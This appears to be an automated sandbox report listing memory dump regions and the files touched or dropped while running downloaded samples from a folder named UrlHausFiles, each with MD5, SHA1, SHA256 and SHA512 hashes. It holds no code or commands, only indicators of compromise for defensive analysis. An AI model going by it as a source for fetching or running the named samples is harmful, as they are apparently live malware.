memory/1224-733-0x0000000000400000-0x0000000000425000-memory.dmp

memory/1224-732-0x0000000000400000-0x0000000000425000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\unik.exe

MD5 8d4744784b89bf2c1affb083790fdc88
SHA1 d3f5d8d2622b0d93f7ce5b0da2b5f4ed439c6ec5
SHA256 d6a689c92843fce8cbd5391511ed74f7e9b6eb9df799626174a8b4c7160bea75
SHA512 b3126463c8d5bb69a161778e871928dc9047b69bfcb56b1af91342034a15e03a1e5a0ccea4ba7334a66a361842e8241046e00500626613a00cb5bec891436641

memory/3636-752-0x0000000000400000-0x00000000008BA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 36988ca14952e1848e81a959880ea217
SHA1 a0482ef725657760502c2d1a5abe0bb37aebaadb
SHA256 d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6
SHA512 d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3d931e76-2d97-46dc-b793-0e3df19e175f.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fab8d8d865e33fe195732aa7dcb91c30
SHA1 2637e832f38acc70af3e511f5eba80fbd7461f2c
SHA256 1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea
SHA512 39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e21f9d7927b3e3339999038450e5ba6c
SHA1 b99e9d7c2fd55e47b5a99915924c05c350b8eed2
SHA256 31dac7297a481790647724631e363abaf464c38f5758613616fcacaf0b7ab3d8
SHA512 45162dbead1e25b748af80913861e9017c576d13952da0527e40376ffaa6c07cbb46b3a64a5fc4877d0eb833c92dfe20cdd0acda3bef2adc483ce78629fffc9c

memory/3636-788-0x0000000010000000-0x000000001001C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe

MD5 2dcfbac83be168372e01d4bd4ec6010c
SHA1 5f0cf3f5be05b478dec3a55b7e1757ca7c1a7fd3
SHA256 68fbb7d4c5af27b3941f4db758e2007decdd35849ab025a9e06d2ad4718b8b63
SHA512 a5acad6b7f97472367f59e85e8d61e7bbf25d6a1fc9054910780593440a2345d9ec8bb22a7f41b5b8f85eacbab9f8971dbe31c11c4c887647f86140f98e5a143

memory/4048-797-0x0000000000400000-0x000000000047D000-memory.dmp

memory/4728-801-0x0000000006440000-0x0000000006494000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe

MD5 169a647d79cf1b25db151feb8d470fc7
SHA1 86ee9ba772982c039b070862d6583bcfed764b2c
SHA256 e61431610df015f48ebc4f4bc0492c4012b34d63b2f474badf6085c9dbc7f708
SHA512 efb5fd3e37da05611be570fb87929af73e7f16639b5eb23140381434dc974afc6a69f338c75ede069b387015e302c5106bf3a8f2727bb0406e7ca1de3d48a925

memory/4312-812-0x000001E7EDE60000-0x000001E7EE07C000-memory.dmp

memory/4312-815-0x000001E7F07B0000-0x000001E7F094E000-memory.dmp

memory/4312-817-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-823-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-835-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-861-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-857-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-867-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-865-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-863-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-855-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-853-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-851-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-859-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-849-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-847-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-845-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-843-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-841-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-839-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-837-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-833-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-831-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-829-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-827-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-821-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-819-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-816-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

memory/4312-825-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe

MD5 b41541e6a56a4b091855938cefc8b0f0
SHA1 8006b2728d05eab4c5d6dc0bb3b115ddc1e2eaa7
SHA256 d4c48762f128436fed18b9c714e55bf7360802127efb233ad31ec4b0f7f649b1
SHA512 a3c2b5dddbb5b8ded63e04672610287458b4bed6ea054e45804e612a2896d92412ef632c621a49b445412d8998a5edc914b055502e22fcfe0e178e5098b64828

memory/4312-2015-0x000001E7F0A50000-0x000001E7F0B5E000-memory.dmp

memory/4312-2016-0x000001E7F0650000-0x000001E7F069C000-memory.dmp

memory/3636-2018-0x0000000000400000-0x00000000008BA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\84KCLP1T\download[2].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/3116-2027-0x0000000000320000-0x0000000000396000-memory.dmp

memory/3116-2046-0x00000000076B0000-0x00000000076CA000-memory.dmp

memory/3116-2047-0x0000000006FB0000-0x0000000006FB6000-memory.dmp

memory/4048-2049-0x0000000000400000-0x000000000047D000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe

MD5 6b84d200c817fd3956d0521f4ba0d1c5
SHA1 14c69b9b4b199c1f21b31ddbde3ce3141a25131d
SHA256 f0e0068b11df929aec7260f53bb5ddf84835a6524fe187724340f23ed09bb639
SHA512 c8f96c208624b348262755aeeb8c89c84aac09c14a5960f77f292110125cebc72685323508195e7c61d8f2c57feb9ed74af5c9a60847a229327c29db6cf8a049

memory/4800-2056-0x0000000000400000-0x000000000041C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

MD5 759f5a6e3daa4972d43bd4a5edbdeb11
SHA1 36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512 f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kmnzbik1.o2z.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3164-2102-0x0000018378140000-0x0000018378162000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bc20bff934a86acf6898a4986bcceaf9
SHA1 bf54082121ca18c9739de73a50b84f07ab6f0513
SHA256 093cb3ac4446458114d8c8e4e47fe26cc31e32e6ff26b0f1ef0a5c626689aa71
SHA512 519660378b15bc02fdc274a8ab811a45b9e52b70254485c20cc9e275639aee90ac4c3ec057a668237bd10400f988a3d1db621508dbcd60bd93dd731ebde8e740

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

memory/4312-2199-0x000001E7F0BA0000-0x000001E7F0BF4000-memory.dmp

memory/4272-2210-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/4272-2215-0x0000024B00360000-0x0000024B00368000-memory.dmp

memory/4272-2244-0x0000024B1A5F0000-0x0000024B1A6FA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

MD5 d76e1525c8998795867a17ed33573552
SHA1 daf5b2ffebc86b85e54201100be10fa19f19bf04
SHA256 f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
SHA512 c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd

memory/4800-4899-0x0000000000400000-0x000000000041C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\client.exe

MD5 d57c5086ea166bc56e091761a43781ff
SHA1 16b7a96e3c43e82ca962bd94ae1898f796c9cd00
SHA256 dc08aa33da827c3199f3f0345606b97b83bc508239c4c24f02a78d6e996bca09
SHA512 893a1fea55837f2cb7cca1a22ab18795c3fcf91edcdf506c269415b06257d17c8fc426b50a8aa2e4dd34de73cc8fe41711b3276b16499a56714aecd2b98cccda

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c1300146567d69e9343e4bffb9b5d018
SHA1 966f6a7deb9a16ea0f0ab102ee94176b8c864c64
SHA256 869cdb4a4fb16f52178d549b4eaf6b8bdaa32aacb06d638747a420acb3a8997c
SHA512 b0b8bc98dae0a186775365c108bbbe3b770bb64905c6057cba420e2a4e9aa1f6351f187d465cb2162514552f2f391a90a6aa660de3169c0778891f04b09c24f4

memory/8012-6110-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 57c05aca699f10d19fd24db73e576240
SHA1 cac9fbbf45fe21d31352154300d2c9b7411ce943
SHA256 35ee3fcf8ab2bc20e87670936b80ce5d9d89c4491d5ec72de31a48784e932bcb
SHA512 9e4258c72c6d0702c64a3e0b6780b7f1fb19c4d5e928f0287ec5b0e6adfe2040542bca252dc5a4cebd675ddb5d1d1d53701baecb838c592360b9fc9a1e832245

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 f7f61ffb8e1f1e272bdf4d326086e760
SHA1 452117f31370a5585d8615fc42bc31fdbe32a348
SHA256 e98ae7f96f7cee07ef93b3c98ccae81c66b29e4ede046112e200bf7c152fa9af
SHA512 158fe3a916f761d766acb75da048b6e224a18d8aadde24af238e6c94be117ff2639463cb4b78c8642a3980d1b9e130741023a848853bca135e8f1fcba481305f

memory/4272-6328-0x0000024B01BC0000-0x0000024B01C16000-memory.dmp

C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

MD5 c3192af2dff9319b35ec48b6fe23b0ff
SHA1 3713858569b97f4044caf9f2e0f8ad5b6b2ef713
SHA256 aec05f916b60a80379a0ecde59749ec89beaa0d331e67846f172dbdce858f278
SHA512 dea78632c6e7d4b749982765857de3daab0ecd2a92ae38a7497d5bdfa6d56d7b8a2378a3043455b645526f67fcdebeaff09d5799c410b383e50e44fa46acd0cd

memory/5796-6355-0x0000000000400000-0x0000000000727000-memory.dmp

memory/8012-6357-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

MD5 3bd08acd4079d75290eb1fb0c34ff700
SHA1 84d4d570c228271f14e42bbb96702330cc8c8c2d
SHA256 4d3d060d8ec7089acfb4ba233d6f2a00a910503be648709a97714c84a80cccd8
SHA512 42309b28e5bf15ee9a4708ffcdb18ef2925d4b51151dab75168d3578db538b658c706cd77bfceae9a927516d3fb4b4bd3356e0ee066af5aaeadaa00ecff9a760

memory/6420-6387-0x0000000000400000-0x000000000042B000-memory.dmp

memory/2964-6396-0x0000000000400000-0x000000000066D000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe

MD5 5c71794e0bfd811534ff4117687d26e2
SHA1 f4e616edbd08c817af5f7db69e376b4788f835a5
SHA256 f5740aded1f401665ab8bde43afee5dc0b01aa8aacabe9b8bb61b1ef52134a39
SHA512 a7a489d39d2cabdd15fd23354140c559a93969a7474c57553c78dbb9ebbf045541f42c600d7d4bea54a2a1f1c6537b8027a1f385fde6040f339959862ac2ea54

C:\Users\Admin\AppData\Local\Temp\nssB09F.tmp\ioSpecial.ini

MD5 82e897f156e4c82d548dd708f837f0a2
SHA1 58c05ee7c4a4b2a855858c99744e50220a65c1b6
SHA256 719161d6e20fa3dd95dd290b6eca348c15a686cc7d17c368e7701f5bd2f7e45c
SHA512 05e1d2a0faf3f57371046e6a9a2a10a6aa92cf49ff62c7c5f4e160a458fddc4cbb7b98c139fbcea62688af96e7910271e4575c576bccff3630c3d0632f881a78

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

MD5 6f154cc5f643cc4228adf17d1ff32d42
SHA1 10efef62da024189beb4cd451d3429439729675b
SHA256 bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff
SHA512 050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1

memory/7820-6496-0x00000000007C0000-0x0000000000AE4000-memory.dmp

memory/3636-6509-0x0000000000400000-0x00000000008BA000-memory.dmp

memory/7980-6511-0x000000001C9F0000-0x000000001CA40000-memory.dmp

memory/7980-6532-0x000000001CB00000-0x000000001CBB2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d13f5d41f67a0df14853e98df208b3b7
SHA1 ee690d3a174496644b6adc2d59212df297548f21
SHA256 bfc826802caaed41b806a6509b42e7cc055f46f99e0dc78e81f64e6bd0615f8e
SHA512 f90441bf3466d8bfc2fbb406670a85455c08b0f5cab306c66cef64e9c8c81c19f585a2dade720e3946202c6729e20ba03cf38bad8167b2ec3e5dc6c742485395

memory/5796-6563-0x0000000000400000-0x0000000000727000-memory.dmp

memory/6420-6568-0x0000000000400000-0x000000000042B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 d2afd93fcb553f22eb199a5cbc5fb70f
SHA1 cf79b779b230eccdce31ce22f8745a2c00d4bbac
SHA256 e4d68c1a2cc7aaadfb03dcd713c8041bbef28dd225f17be8ab7ff64832fab346
SHA512 bfb835571b4d4428711c5777c01918fb0f1f6791a60dfdc41b69439f706092910552405344533a59bf2795f672c3241bc83b78ce8a68d540645d25a472817304

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 7c13e1ef9a7825a781ca4137780f732e
SHA1 480e51fdb6060b7573bffd8064db1c7abaf3bd07
SHA256 f532fa4b25f7a3c90c2c7524324394b1562f5bd3ad2eabcbf632b6c5046108ac
SHA512 557e833baf1f281b77fdb858112b0ea097674fd0a419de298ee1d398cc669d77f3cd7fe58cf491185e0092f257c2f9b39598df976fb4a65d0a5398c749a9d688

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58d83a.TMP

MD5 6946c194f288b2bf3305e516b8c48f83
SHA1 da72e14366952d95a44146eb32cb19bfecf2c8b7
SHA256 b85dae14f3385d5c0417569b12a70a634b31451bcf73f32017591a230dad5f9c
SHA512 1ebbc2a0172211d63f42db22c39e3e1ebe90454de7bf5b125f9f63921d2bcc551634910b3f4cebb19491785a0d5b0d59f0847a7951d3a632c5836b332273419c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 99fd9a26b574900b8812fdad22c15e33
SHA1 b67a0d80f8a255e2a0fc404933a059b7400ab7b1
SHA256 10cb8296d9b3d4ea62eed7ecf55a70364fe101f266f146a96b2bf6170ef73416
SHA512 b4d6867f7d2da2b6e6cd2176079dff757e1f993cf7eb2b5aeb257932c3cc17a0cbfd1655b6169773088bbfbc503bb9c097daf6ea14c329ce083426ddf3c286fe